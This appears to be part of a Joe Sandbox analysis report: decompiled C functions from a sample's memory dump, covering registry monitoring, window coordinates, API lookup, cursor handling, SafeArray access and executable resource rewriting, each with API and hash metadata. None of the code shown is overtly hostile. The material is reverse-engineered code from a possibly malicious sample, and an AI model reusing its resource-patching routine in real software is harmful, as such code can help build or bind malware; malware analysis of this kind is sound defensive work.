                                                    				_t18 = RegNotifyChangeKeyValue( *( *((intOrPtr*)(_t21 + 0x40)) + 4),  *(_t21 + 0x44),  *(_t21 + 0x48),  *(_t21 + 0x50), 0xffffffff);
                                                    				if(_t18 != 0) {
                                                    					_t20 = E0040D144("Can not start monitoring", 1);
                                                    					E00404378();
                                                    					return _t20;
                                                    				}
                                                    				return _t18;
                                                     			}

                                                    Instruction addresses for the listing above, in listing order (0x00000000 marks a synthetic line such as a goto): 0x00494695, 0x00494697, 0x004946ab, 0x004946bb, 0x004946cf, 0x004946d0, 0x004946da, 0x004946e1, 0x004946ef, 0x004946f4, 0x00000000, 0x004946f4, 0x004946fa

                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946A6
                                                    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946B6
                                                    • RegNotifyChangeKeyValue.ADVAPI32(?,?,00000005,?,000000FF,00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946DA
                                                    Strings
                                                    • Can not start monitoring, xrefs: 004946E3
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateEvent$ChangeNotifyValue
                                                    • String ID: Can not start monitoring
                                                    • API String ID: 2233126570-3835272546
                                                    • Opcode ID: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                    • Instruction ID: 443d9707a36d2025ed6040a5d28f1c7387ed03c1380d4d8ed495eb8cf4c6426e
                                                    • Opcode Fuzzy Hash: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                    • Instruction Fuzzy Hash: 02F0F4B06442016FDB54DFADCC85F1537A46F05715F1102A5FB14DF2D6E675DC048714
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                     			// Editor's note, not part of the sandbox output. Converts the client-area point
                                                     			// (__edx, __ecx) of window __eax into coordinates relative to the window's outer
                                                     			// rectangle: ClientToScreen on the point, GetWindowRect on the window, then the
                                                     			// rectangle's left/top are subtracted and the result is written through the
                                                     			// pointer passed as _a4. The "// 0x443144" annotations are values the decompiler
                                                     			// saw in those stack slots in the memory snapshot (most likely a return address);
                                                     			// the same bytes produce the "String ID" D1D$D1D below, since 0x00443144 stored
                                                     			// little-endian is 44 31 44 00, i.e. "D1D". Neither is a real string.
                                                     			E00442ECC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				struct tagRECT _v28;
                                                    				intOrPtr _t19;
                                                    				struct HWND__* _t20;
                                                    				intOrPtr* _t23;
                                                    
                                                    				_t20 = __eax;
                                                    				_t1 =  &_a4; // 0x443144
                                                    				_t23 =  *_t1;
                                                    				_v12 = __edx;
                                                    				_v8 = __ecx;
                                                    				_t4 =  &_v12; // 0x443144
                                                    				ClientToScreen(__eax, _t4);
                                                    				GetWindowRect(_t20,  &_v28);
                                                    				_t6 =  &_v12; // 0x443144
                                                    				 *_t23 =  *_t6 - _v28.left;
                                                    				_t19 = _v8 - _v28.top;
                                                    				 *((intOrPtr*)(_t23 + 4)) = _t19;
                                                    				return _t19;
                                                     			}

                                                    Instruction addresses for the listing above, in listing order: 0x00442ed4, 0x00442ed6, 0x00442ed6, 0x00442ed9, 0x00442edc, 0x00442edf, 0x00442ee4, 0x00442eee, 0x00442ef3, 0x00442ef9, 0x00442efe, 0x00442f01, 0x00442f09

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClientRectScreenWindow
                                                    • String ID: D1D$D1D
                                                    • API String ID: 3371951266-2689743835
                                                    • Opcode ID: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                    • Instruction ID: 696a0ad0a36b5a628bc16ef9a9fef7e4a028d98c1b31806480246e0535002fd9
                                                    • Opcode Fuzzy Hash: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                    • Instruction Fuzzy Hash: 4DF0A2B5D0420DAFCB00DFE9C9818DEFBFCEB08250F10456AA945F3741E630AA408BA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040E884() {
                                                    				_Unknown_base(*)()* _t1;
                                                    				_Unknown_base(*)()* _t2;
                                                    				struct HINSTANCE__* _t3;
                                                    
                                                    				_t1 = GetModuleHandleA("kernel32.dll");
                                                    				_t3 = _t1;
                                                    				if(_t3 != 0) {
                                                    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                    					 *0x49b158 = _t1;
                                                    				}
                                                    				if( *0x49b158 == 0) {
                                                    					_t2 =  &M00409ED4;
                                                    					 *0x49b158 = _t2;
                                                    					return _t2;
                                                    				}
                                                    				return _t1;
                                                    			}

                                                    0x0040e88a
                                                    0x0040e88f
                                                    0x0040e893
                                                    0x0040e89b
                                                    0x0040e8a0
                                                    0x0040e8a0
                                                    0x0040e8ac
                                                    0x0040e8ae
                                                    0x0040e8b3
                                                    0x00000000
                                                    0x0040e8b3
                                                    0x0040e8b9

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F2ED,00000000,0040F300), ref: 0040E88A
                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                    • API String ID: 1646373207-3712701948
                                                    • Opcode ID: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                    • Instruction ID: 06fc51cb68962c5c382d4d7a2f86af93b26a51ec458fff072f92dd4ff1898c2b
                                                    • Opcode Fuzzy Hash: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                    • Instruction Fuzzy Hash: CFD09E62A043C55AF700BBA6A9EA7162658D720344B24C83BA000773D2D7FD4C94979D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E00438E8C(intOrPtr* __eax, signed int __edx) {
                                                    				intOrPtr _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				char _v28;
                                                    				intOrPtr _t49;
                                                    				intOrPtr _t50;
                                                    				intOrPtr _t53;
                                                    				intOrPtr _t54;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t56;
                                                    				intOrPtr* _t60;
                                                    				intOrPtr* _t62;
                                                    				struct HICON__* _t65;
                                                    				intOrPtr _t67;
                                                    				intOrPtr* _t72;
                                                    				intOrPtr _t74;
                                                    				intOrPtr* _t75;
                                                    				intOrPtr _t78;
                                                    				intOrPtr _t80;
                                                    				intOrPtr _t82;
                                                    				intOrPtr _t84;
                                                    				intOrPtr _t85;
                                                    				struct HWND__* _t88;
                                                    				intOrPtr _t89;
                                                    				intOrPtr _t91;
                                                    				intOrPtr* _t93;
                                                    				intOrPtr _t97;
                                                    				intOrPtr _t100;
                                                    				intOrPtr _t102;
                                                    				intOrPtr _t103;
                                                    				intOrPtr _t104;
                                                    				intOrPtr _t106;
                                                    				struct HWND__* _t107;
                                                    				intOrPtr _t108;
                                                    				intOrPtr _t110;
                                                    				intOrPtr _t114;
                                                    				intOrPtr _t117;
                                                    				char _t118;
                                                    				intOrPtr _t119;
                                                    				void* _t131;
                                                    				intOrPtr _t135;
                                                    				intOrPtr _t140;
                                                    				intOrPtr* _t155;
                                                    				void* _t158;
                                                    				void* _t165;
                                                    				void* _t166;
                                                    
                                                    				_t155 = __eax;
                                                    				if( *0x49eb54 != 0) {
                                                    					L3:
                                                    					_t49 =  *0x49eb34; // 0x0
                                                    					_t50 =  *0x49eb34; // 0x0
                                                    					_t117 = E00438D6C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                                                    					if( *0x49eb54 == 0) {
                                                    						_t168 =  *0x49eb58;
                                                    						if( *0x49eb58 != 0) {
                                                    							_t106 =  *0x49eb48; // 0x0
                                                    							_t107 = GetDesktopWindow();
                                                    							_t108 =  *0x49eb58; // 0x0
                                                    							E00443038(_t108, _t107, _t168, _t106);
                                                    						}
                                                    					}
                                                    					_t53 =  *0x49eb34; // 0x0
                                                    					if( *((char*)(_t53 + 0x9b)) != 0) {
                                                    						__eflags =  *0x49eb54;
                                                    						_t6 =  &_v24;
                                                    						 *_t6 =  *0x49eb54 != 0;
                                                    						__eflags =  *_t6;
                                                    						 *0x49eb54 = 2;
                                                    					} else {
                                                    						 *0x49eb54 = 1;
                                                    						_v24 = 0;
                                                    					}
                                                    					_t54 =  *0x49eb38; // 0x0
                                                    					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                                    						L12:
                                                    						_t55 =  *0x49eb38; // 0x0
                                                    						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                                    						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                    						_t56 =  *0x49eb38; // 0x0
                                                    						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                                    							_t97 =  *0x49eb38; // 0x0
                                                    							E0043AAC0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                                    							_t100 =  *0x49eb38; // 0x0
                                                    							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                                    							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                                    						}
                                                    						_t131 = E00438DBC(2);
                                                    						_t121 =  *_t155;
                                                    						_t60 =  *0x49eb38; // 0x0
                                                    						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                                    						if( *0x49eb58 != 0) {
                                                    							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                                    								_t82 =  *0x49eb58; // 0x0
                                                    								E00443020(_t82, _t158);
                                                    								_t84 =  *0x49eb58; // 0x0
                                                    								_t177 =  *((char*)(_t84 + 0x6a));
                                                    								if( *((char*)(_t84 + 0x6a)) != 0) {
                                                    									_t121 =  *((intOrPtr*)(_t155 + 4));
                                                    									_t85 =  *0x49eb58; // 0x0
                                                    									E00443120(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                                    								} else {
                                                    									_t88 = GetDesktopWindow();
                                                    									_t121 =  *_t155;
                                                    									_t89 =  *0x49eb58; // 0x0
                                                    									E00443038(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                                    								}
                                                    							} else {
                                                    								_t91 =  *0x49eb58; // 0x0
                                                    								E00443194(_t91, _t131, __eflags);
                                                    								_t93 =  *0x49de0c; // 0x49ebbc
                                                    								SetCursor(E004586EC( *_t93, _t158));
                                                    							}
                                                    						}
                                                    						_t62 =  *0x49de0c; // 0x49ebbc
                                                    						_t65 = SetCursor(E004586EC( *_t62, _t158));
                                                    						if( *0x49eb54 != 2) {
                                                    							L32:
                                                    							return _t65;
                                                    						} else {
                                                    							_t179 = _t117;
                                                    							if(_t117 != 0) {
                                                    								_t118 = E00438DF8(_t121);
                                                    								_t67 =  *0x49eb38; // 0x0
                                                    								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                                    								__eflags = _t118;
                                                    								if(__eflags != 0) {
                                                    									E0043AAC0(_t118,  &_v24, _t155);
                                                    									_t65 = L00403DE8(_t118, __eflags);
                                                    									_t135 =  *0x49eb38; // 0x0
                                                    									 *(_t135 + 0x54) = _t65;
                                                    								} else {
                                                    									_t78 =  *0x49eb38; // 0x0
                                                    									_t65 = L00403DE8( *((intOrPtr*)(_t78 + 4)), __eflags);
                                                    									_t140 =  *0x49eb38; // 0x0
                                                    									 *(_t140 + 0x54) = _t65;
                                                    								}
                                                    							} else {
                                                    								_push( *((intOrPtr*)(_t155 + 4)));
                                                    								_t80 =  *0x49eb38; // 0x0
                                                    								_t65 = L00403DE8( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                                    							}
                                                    							if( *0x49eb38 == 0) {
                                                    								goto L32;
                                                    							} else {
                                                    								_t119 =  *0x49eb38; // 0x0
                                                    								_t41 = _t119 + 0x5c; // 0x5c
                                                    								_t42 = _t119 + 0x44; // 0x44
                                                    								_t65 = E00408E50(_t42, 0x10, _t41);
                                                    								if(_t65 != 0) {
                                                    									goto L32;
                                                    								}
                                                    								if(_v28 != 0) {
                                                    									_t75 =  *0x49eb38; // 0x0
                                                    									 *((intOrPtr*)( *_t75 + 0x34))();
                                                    								}
                                                    								_t72 =  *0x49eb38; // 0x0
                                                    								 *((intOrPtr*)( *_t72 + 0x30))();
                                                    								_t74 =  *0x49eb38; // 0x0
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								asm("movsd");
                                                    								return _t74;
                                                    							}
                                                    						}
                                                    					}
                                                    					_t65 = E00438DBC(1);
                                                    					if( *0x49eb38 == 0) {
                                                    						goto L32;
                                                    					}
                                                    					_t102 =  *0x49eb38; // 0x0
                                                    					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                                    					_t103 =  *0x49eb38; // 0x0
                                                    					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                                    					_t104 =  *0x49eb38; // 0x0
                                                    					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                                    					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                    					_t65 = E00438DBC(0);
                                                    					if( *0x49eb38 == 0) {
                                                    						goto L32;
                                                    					}
                                                    					goto L12;
                                                    				}
                                                    				_t110 =  *0x49eb44; // 0x0
                                                    				asm("cdq");
                                                    				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x49eb50; // 0x0
                                                    				if(_t165 >= 0) {
                                                    					goto L3;
                                                    				}
                                                    				_t114 =  *0x49eb48; // 0x0
                                                    				asm("cdq");
                                                    				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                                    				_t166 = _t65 -  *0x49eb50; // 0x0
                                                    				if(_t166 < 0) {
                                                    					goto L32;
                                                    				}
                                                    				goto L3;
                                                    			}

                                                    0x00438e92
                                                    0x00438e9b
                                                    0x00438eca
                                                    0x00438eca
                                                    0x00438ed0
                                                    0x00438ee6
                                                    0x00438eef
                                                    0x00438ef1
                                                    0x00438ef8
                                                    0x00438efa
                                                    0x00438f00
                                                    0x00438f0d
                                                    0x00438f12
                                                    0x00438f12
                                                    0x00438ef8
                                                    0x00438f17
                                                    0x00438f23
                                                    0x00438f33
                                                    0x00438f3a
                                                    0x00438f3a
                                                    0x00438f3a
                                                    0x00438f3f
                                                    0x00438f25
                                                    0x00438f25
                                                    0x00438f2c
                                                    0x00438f2c
                                                    0x00438f46
                                                    0x00438f4e
                                                    0x00438f9b
                                                    0x00438f9b
                                                    0x00438fa2
                                                    0x00438fa8
                                                    0x00438fab
                                                    0x00438fb4
                                                    0x00438fbc
                                                    0x00438fc4
                                                    0x00438fc9
                                                    0x00438fd2
                                                    0x00438fd9
                                                    0x00438fd9
                                                    0x00438fe7
                                                    0x00438fe9
                                                    0x00438feb
                                                    0x00438ff5
                                                    0x00438ffe
                                                    0x00439002
                                                    0x0043900c
                                                    0x00439011
                                                    0x00439016
                                                    0x0043901b
                                                    0x0043901f
                                                    0x0043903a
                                                    0x0043903f
                                                    0x00439044
                                                    0x00439021
                                                    0x00439025
                                                    0x0043902c
                                                    0x0043902e
                                                    0x00439033
                                                    0x00439033
                                                    0x0043904b
                                                    0x0043904b
                                                    0x00439050
                                                    0x00439058
                                                    0x00439065
                                                    0x00439065
                                                    0x00439002
                                                    0x0043906d
                                                    0x0043907a
                                                    0x00439086
                                                    0x00439159
                                                    0x00439159
                                                    0x0043908c
                                                    0x0043908c
                                                    0x0043908e
                                                    0x004390af
                                                    0x004390b1
                                                    0x004390b6
                                                    0x004390b9
                                                    0x004390bb
                                                    0x004390e9
                                                    0x004390f8
                                                    0x004390fd
                                                    0x00439103
                                                    0x004390bd
                                                    0x004390c5
                                                    0x004390d1
                                                    0x004390d6
                                                    0x004390dc
                                                    0x004390dc
                                                    0x00439090
                                                    0x00439093
                                                    0x00439096
                                                    0x004390a3
                                                    0x004390a3
                                                    0x0043910d
                                                    0x00000000
                                                    0x0043910f
                                                    0x0043910f
                                                    0x00439115
                                                    0x00439118
                                                    0x00439120
                                                    0x00439127
                                                    0x00000000
                                                    0x00000000
                                                    0x0043912e
                                                    0x00439130
                                                    0x00439137
                                                    0x00439137
                                                    0x0043913a
                                                    0x00439141
                                                    0x00439144
                                                    0x0043914f
                                                    0x00439150
                                                    0x00439151
                                                    0x00439152
                                                    0x00000000
                                                    0x00439152
                                                    0x0043910d
                                                    0x00439086
                                                    0x00438f52
                                                    0x00438f5e
                                                    0x00000000
                                                    0x00000000
                                                    0x00438f64
                                                    0x00438f69
                                                    0x00438f6c
                                                    0x00438f74
                                                    0x00438f77
                                                    0x00438f7e
                                                    0x00438f84
                                                    0x00438f89
                                                    0x00438f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00438f95
                                                    0x00438e9d
                                                    0x00438ea4
                                                    0x00438ea9
                                                    0x00438eaf
                                                    0x00000000
                                                    0x00000000
                                                    0x00438eb1
                                                    0x00438eb9
                                                    0x00438ebc
                                                    0x00438ebe
                                                    0x00438ec4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00438F00
                                                    • GetDesktopWindow.USER32 ref: 00439025
                                                    • SetCursor.USER32(00000000), ref: 0043907A
                                                      • Part of subcall function 00443194: 739F1770.COMCTL32(00000000,?,00439055), ref: 004431B0
                                                      • Part of subcall function 00443194: ShowCursor.USER32(000000FF,00000000,?,00439055), ref: 004431CB
                                                    • SetCursor.USER32(00000000), ref: 00439065
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cursor$DesktopWindow$F1770Show
                                                    • String ID:
                                                    • API String ID: 197431414-0
                                                    • Opcode ID: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                    • Instruction ID: 7774f5f5771a5045a1e06358bb4aae0e40f1de296239ba1c3ef58bb47b11143b
                                                    • Opcode Fuzzy Hash: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                    • Instruction Fuzzy Hash: 8C919174606241DFE704DF2AD885A06B7F1BB69314F14907BE4069B3A2CB78FC85CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E004107F0(intOrPtr* __eax) {
                                                    				char _v260;
                                                    				char _v768;
                                                    				char _v772;
                                                    				intOrPtr* _v776;
                                                    				signed short* _v780;
                                                    				char _v784;
                                                    				signed int _v788;
                                                    				char _v792;
                                                    				intOrPtr* _v796;
                                                    				signed char _t43;
                                                    				intOrPtr* _t60;
                                                    				void* _t79;
                                                    				void* _t81;
                                                    				void* _t84;
                                                    				void* _t85;
                                                    				intOrPtr* _t92;
                                                    				void* _t96;
                                                    				char* _t97;
                                                    				void* _t98;
                                                    
                                                    				_v776 = __eax;
                                                    				if(( *(_v776 + 1) & 0x00000020) == 0) {
                                                    					E00410638(0x80070057);
                                                    				}
                                                    				_t43 =  *_v776;
                                                    				if((_t43 & 0x00000fff) == 0xc) {
                                                    					if((_t43 & 0x00000040) == 0) {
                                                    						_v780 =  *((intOrPtr*)(_v776 + 8));
                                                    					} else {
                                                    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                                                    					}
                                                    					_v788 =  *_v780 & 0x0000ffff;
                                                    					_t79 = _v788 - 1;
                                                    					if(_t79 >= 0) {
                                                    						_t85 = _t79 + 1;
                                                    						_t96 = 0;
                                                    						_t97 =  &_v772;
                                                    						do {
                                                    							_v796 = _t97;
                                                    							_push(_v796 + 4);
                                                    							_t22 = _t96 + 1; // 0x1
                                                    							_push(_v780);
                                                    							L0040F78C();
                                                    							E00410638(_v780);
                                                    							_push( &_v784);
                                                    							_t25 = _t96 + 1; // 0x1
                                                    							_push(_v780);
                                                    							L0040F794();
                                                    							E00410638(_v780);
                                                    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                                    							_t96 = _t96 + 1;
                                                    							_t97 = _t97 + 8;
                                                    							_t85 = _t85 - 1;
                                                    						} while (_t85 != 0);
                                                    					}
                                                    					_t81 = _v788 - 1;
                                                    					if(_t81 >= 0) {
                                                    						_t84 = _t81 + 1;
                                                    						_t60 =  &_v768;
                                                    						_t92 =  &_v260;
                                                    						do {
                                                    							 *_t92 =  *_t60;
                                                    							_t92 = _t92 + 4;
                                                    							_t60 = _t60 + 8;
                                                    							_t84 = _t84 - 1;
                                                    						} while (_t84 != 0);
                                                    						do {
                                                    							goto L12;
                                                    						} while (E00410794(_t83, _t98) != 0);
                                                    						goto L15;
                                                    					}
                                                    					L12:
                                                    					_t83 = _v788 - 1;
                                                    					if(E00410764(_v788 - 1, _t98) != 0) {
                                                    						_push( &_v792);
                                                    						_push( &_v260);
                                                    						_push(_v780);
                                                    						L0040F79C();
                                                    						E00410638(_v780);
                                                    						E004109E8(_v792);
                                                    					}
                                                    				}
                                                    				L15:
                                                    				_push(_v776);
                                                    				L0040F320();
                                                    				return E00410638(_v776);
                                                    			}
                                                    0x004107fc
                                                    0x0041080c
                                                    0x00410813
                                                    0x00410813
                                                    0x0041081e
                                                    0x0041082c
                                                    0x0041083b
                                                    0x00410859
                                                    0x0041083d
                                                    0x00410848
                                                    0x00410848
                                                    0x00410868
                                                    0x00410874
                                                    0x00410877
                                                    0x00410879
                                                    0x0041087a
                                                    0x0041087c
                                                    0x00410882
                                                    0x00410884
                                                    0x00410893
                                                    0x00410894
                                                    0x0041089e
                                                    0x0041089f
                                                    0x004108a4
                                                    0x004108af
                                                    0x004108b0
                                                    0x004108ba
                                                    0x004108bb
                                                    0x004108c0
                                                    0x004108db
                                                    0x004108dd
                                                    0x004108de
                                                    0x004108e1
                                                    0x004108e1
                                                    0x00410882
                                                    0x004108ea
                                                    0x004108ed
                                                    0x004108ef
                                                    0x004108f0
                                                    0x004108f6
                                                    0x004108fc
                                                    0x004108fe
                                                    0x00410900
                                                    0x00410903
                                                    0x00410906
                                                    0x00410906
                                                    0x00410909
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00410909
                                                    0x00410909
                                                    0x00410910
                                                    0x0041091b
                                                    0x00410923
                                                    0x0041092a
                                                    0x00410931
                                                    0x00410932
                                                    0x00410937
                                                    0x00410942
                                                    0x00410942
                                                    0x00410950
                                                    0x00410954
                                                    0x0041095a
                                                    0x0041095b
                                                    0x0041096b

                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041089F
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004108BB
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410932
                                                    • VariantClear.OLEAUT32(?), ref: 0041095B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                    • String ID:
                                                    • API String ID: 920484758-0
                                                    • Opcode ID: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                    • Instruction ID: 03341164d2f6fde75e1a46505fe440e945d96e45a0ae1fefe7a635db93ae447a
                                                    • Opcode Fuzzy Hash: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                    • Instruction Fuzzy Hash: 1D412C75A0121D8FCB61EB59C890AC9B3BCAF48314F0041EAE54CE7202DA78AFC58F54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 57%
                                                    			E00477370(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				char _v13;
                                                    				long _v20;
                                                    				void* _v24;
                                                    				struct HINSTANCE__* _t47;
                                                    				int _t53;
                                                    				char _t56;
                                                    				void* _t61;
                                                    				struct HINSTANCE__* _t64;
                                                    				intOrPtr _t69;
                                                    				intOrPtr _t75;
                                                    				intOrPtr* _t79;
                                                    				void* _t81;
                                                    				void* _t82;
                                                    				intOrPtr _t83;
                                                    
                                                    				_t81 = _t82;
                                                    				_t83 = _t82 + 0xffffffec;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t81);
                                                    				_push(0x477494);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t83;
                                                    				_t61 = BeginUpdateResourceA(E00404E80(_v8), 0);
                                                    				_v13 = _t61 != 0;
                                                    				if(_v13 == 0) {
                                                    					_pop(_t69);
                                                    					 *[fs:eax] = _t69;
                                                    					_push(0x47749b);
                                                    					return E004049E4( &_v12, 2);
                                                    				} else {
                                                    					 *[fs:eax] = _t83;
                                                    					_t64 =  *0x49ec78; // 0x0
                                                    					_t79 = E0041E0D0(_t64, 1, 0xa, _v12);
                                                    					_v20 =  *((intOrPtr*)( *_t79))( *[fs:eax], 0x477472, _t81);
                                                    					_v24 = E0040275C( *((intOrPtr*)( *_t79))());
                                                    					 *((intOrPtr*)( *_t79 + 0xc))();
                                                    					L00403BEC(_t79);
                                                    					_t47 =  *0x49ec78; // 0x0
                                                    					FreeLibrary(_t47);
                                                    					_t53 = UpdateResourceA(_t61, 0xa, E00404E80(_v12), 0, _v24, _v20);
                                                    					asm("sbb eax, eax");
                                                    					_v13 = _t53 + 1;
                                                    					if(EndUpdateResourceA(_t61, 0) == 0 || _v13 == 0) {
                                                    						_t56 = 0;
                                                    					} else {
                                                    						_t56 = 1;
                                                    					}
                                                    					_v13 = _t56;
                                                    					_pop(_t75);
                                                    					 *[fs:eax] = _t75;
                                                    					_push(0x477479);
                                                    					return E0040277C(_v24);
                                                    				}
                                                    			}
                                                    0x00477371
                                                    0x00477373
                                                    0x00477379
                                                    0x0047737c
                                                    0x00477382
                                                    0x0047738a
                                                    0x00477391
                                                    0x00477392
                                                    0x00477397
                                                    0x0047739a
                                                    0x004773ad
                                                    0x004773b1
                                                    0x004773b9
                                                    0x0047747b
                                                    0x0047747e
                                                    0x00477481
                                                    0x00477493
                                                    0x004773bf
                                                    0x004773ca
                                                    0x004773d3
                                                    0x004773e5
                                                    0x004773ed
                                                    0x004773fb
                                                    0x00477408
                                                    0x0047740d
                                                    0x00477412
                                                    0x00477418
                                                    0x00477433
                                                    0x0047743b
                                                    0x0047743e
                                                    0x0047744b
                                                    0x00477453
                                                    0x00477457
                                                    0x00477457
                                                    0x00477457
                                                    0x00477459
                                                    0x0047745e
                                                    0x00477461
                                                    0x00477464
                                                    0x00477471
                                                    0x00477471

                                                    APIs
                                                    • BeginUpdateResourceA.KERNEL32 ref: 004773A8
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00000000,00000000,00477494), ref: 00477418
                                                    • UpdateResourceA.KERNEL32(00000000,0000000A,00000000,00000000,?,?), ref: 00477433
                                                    • EndUpdateResourceA.KERNEL32 ref: 00477444
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ResourceUpdate$BeginFreeLibrary
                                                    • String ID:
                                                    • API String ID: 2368538523-0
                                                    • Opcode ID: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                    • Instruction ID: 788fa2fdaf6e603f0e993ca8ed72eb25dca608fc93a6157178922b6ccb5e32dc
                                                    • Opcode Fuzzy Hash: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                    • Instruction Fuzzy Hash: 66317270B04205AFD701EBB9DC41BAEBBB9EB49704F5084BAF504F7291DA79AD00C799
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
